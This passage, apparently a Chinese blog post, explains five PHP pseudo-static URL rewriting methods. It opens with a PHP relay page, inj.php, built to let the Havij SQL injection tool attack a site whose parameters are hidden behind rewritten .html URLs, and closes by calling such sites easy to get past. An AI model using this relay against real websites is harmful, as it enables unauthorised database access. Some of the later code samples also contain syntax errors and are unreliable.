先說實現方法:
inj.php:
<?phpset_time_limit(10);$id=$_GET["id"];$id=str_replace(" ","%20",$id);$id=str_replace("=","%3D",$id);$url="http://www.xxx.com/index.php/library/more/id/$id.html";$ch=curl_init();curl_setopt($ch,CURLOPT_URL,"$url");curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);//啟用時將curl_init()擷取的資訊以檔案流的形式返回,而不是直接輸出curl_setopt($ch,CURLOPT_HEADER,0);//啟用時會將標頭檔的資訊作為資料流輸出$output=curl_exec($ch);curl_close($ch);print_r($output);?>
用wamp搭建一個伺服器,把上面inj.php放到wamp/www/中,然後在Havij中跑 http://127.0.0.1/inj.php?id=1
=============================
PHP偽靜態實現方法一(利用Apache 伺服器的功能)
1、檢查Apache是否支援mod_rewrite
2、讓Apache 支援.htaccess
3、建立.htaccess檔案
4、規則:
RewriteEngine on
RewriteRule ([a-zA-Z]{1,})-([0-9]{1,}).html$index.php?action=$1&id=$2
([a-zA-Z]{1,})-([0-9]{1,}) 是 URL長啥樣
$1 是([a-zA-Z]{1,}) 所匹配的
$2 是[0-9]{1,} 所匹配的
比如說:www.xx.com/page-18.html
真實的URL如下:
action = page
id = 18
============================
PHP偽靜態實現方法二(編碼實現)
$Php2Html_FileUrl = $_SERVER["REQUEST_URI"]
echo $Php2Html_FileUrl
例子:// localhost/php100/test.php?id|1@action|2
$Php2Html_UrlString = str_replace("?","",str_replace("/","",strrchr(strrchr($Php2Html_FileUrl,"/"),"?")) ))/*內層的strrchr出來:/test.php?id|1@action|2外層的strrchr出來:id|1@action|2內層的str_replace出來:把 / 號去掉,本例子 沒有外層的str_replace出來:把 ?號去掉,本例子 沒有*/$Php2Html_UrlQueryStrList = explode("@",$Php2Html_UrlString);/*把str變成以@為界限劃分的數組:id|1 和 action|2*/foreach($Php2Html_UrlQueryStrList as $Php2Html_UrlQueryStr){ $Php2Html_TmpArray = explode("|",$Php2Html_UrlQueryStr); /* id => 1 和 action => 2*/ $_GET[$Php2Html_TmpArray[0]] = $Php2Html_TmpArray[1];}
============================
PHP偽靜態實現方法三(編碼實現)
例子: localhost/php100/test.php/1/2
$filename = basename($_SERVER["SCRIPT_NAME"]);echo $_SERVER["SCRIPT_NAME"];echo $filename;if(strtolower($filename) == 'test.php'){ if(!empty($_GET[id])){ $id=intval($_GET[id]); echo $id; $action = intval($_GET[action]); echo $action; }else{ $nav=$_SERVER["REQUEST_URI"]; $script=$_SERVER["SRCIPT_NAME"]; //這句話應該是把URL前面那段給搞掉。。剩下 "1/2"之類的。。 $nav=ereg_replace("$script","",urldecode($nav)); echo $nav; $vars = explode("/",$nav); print_r($vars); $id=intval($vars[1]); $action=intval($vars[2]); } echo $id.'&'.$action;}
============================
PHP偽靜態實現方法四(編碼實現)
function mod_rewrite(){ global $_GET; $nav = $_SERVER["REQUEST_URI"]; $script_name = $_SERVER["SCRIPT_NAME"] $nav=substr(ereg_replace("$script_name"),"",urldecode($nav)),1); $nav=preg_replace("/^.ht(m){1}(l){0,1}$/","",$nav);//去掉尾部的htm或html $vars=explode("/",$nav); print_r($vars); for($i=0;$i<count($vars);$i+=2) { $_GET[$vars[$i]] = $vars[$i+1]; } return $_GET;}
============================
PHP偽靜態實現方法五(編碼實現)
例子:/1,100,8630.html
if(preg_match(“/\/(\d+),(\d+),(\d+)\.html/si”,$path_info,$arr_path)){ $gid =intval($arr_path[1]); //取得值1 $sid =intval($arr_path[2]); //取得值100 $softid =intval($arr_path[3]); //取得值8630}else echo "Path:Error!";
總結下:(1)偽靜態技術比較好突破,需要自己構造中轉注入頁面。
(2)偽靜態技術原理都很簡單,就是把原來的 index.php?id=1 這種形式的URL給替換成其它形式。
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
